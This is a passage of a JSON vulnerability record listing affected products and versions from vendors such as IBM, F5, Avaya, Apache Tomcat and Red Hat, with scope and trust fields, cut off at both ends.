        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.1"
      },
      {
        "model": "big-ip link controller hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.3"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "aura application server sip core pb23",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "guardium database activity monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.1"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.4"
      },
      {
        "model": "big-ip ltm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "cognos business viewpoint fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.2"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.44"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.2"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "rational automation framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.0"
      },
      {
        "model": "tomcat",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apache",
        "version": "8.0.5"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.14"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "big-ip ltm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "tomcat beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "7.0.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.11"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.8.0"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "jboss web server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.0.1"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.1"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.0.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.51"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.12"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "flex system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3.0.5"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "guardium database activity monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "big-ip edge gateway hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storwize unified",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.34"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "jboss operations network",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3.2.2"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.23"
      },
      {
        "model": "big-ip ltm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "rational sap connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.3"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.2"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "storwize unified",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.2"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.2.1"
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "cognos business viewpoint fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.5"
      },
      {
        "model": "big-ip psm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip gtm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "secure analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2013.2"
      },
      {
        "model": "big-ip apm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.2.0.8"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip psm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip wom hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "tomcat 8.0.0-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "apache",
        "version": null
      },
      {
        "model": "tomcat 8.0.0-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "apache",
        "version": null
      },
      {
        "model": "openpages grc platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "big-ip asm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.7.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "secure analytics 2013.2r9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security threat response manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2013.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.41"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.21"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "aura application server sip core pb28",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.5"
      },
      {
        "model": "big-ip link controller hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.1"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip edge gateway hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "big-ip webaccelerator hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "tomcat 8.0.0-rc10",
        "scope": null,
        "trust": 0.3,
        "vendor": "apache",
        "version": null
      },
      {
        "model": "big-ip wom hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "messaging application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.5"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.20"
      },
      {
        "model": "secure analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2014.2"
      },
      {
        "model": "big-ip edge gateway hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.14"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.40"
      },
      {
        "model": "flashsystem 9848-ac1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.32"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.3"
      },
      {
        "model": "big-ip psm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "hp-ux web server suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.29"
      },
      {
        "model": "big-ip webaccelerator hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.1"
      },
      {
        "model": "big-ip wom hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip analytics 11.0.0-hf2",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "big-ip afm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.6"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "flashsystem 9846-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2.0.8"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.0"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "messaging application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.3"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.2.0.8"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.0"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.11"
      },
      {
        "model": "enterprise linux hpc node optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "hp-ux b.11.23",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "flashsystem 9846-ac0",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.4"
      },
      {
        "model": "big-ip edge gateway hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "jboss enterprise web server el6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.8.3"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.1"
      },
      {
        "model": "san volume controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.8"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2.3"
      },
      {
        "model": "big-ip psm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip ltm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.9.3"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.45"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.1"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "aura application server sip core pb19",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "tomcat rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "8.0.0"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.0"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "ip office application server sp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.01"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.33"
      },
      {
        "model": "security threat response manager 2013.2r9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.3.0"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "6.0.25"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1.6"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.1.0"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.1.1"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip ltm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
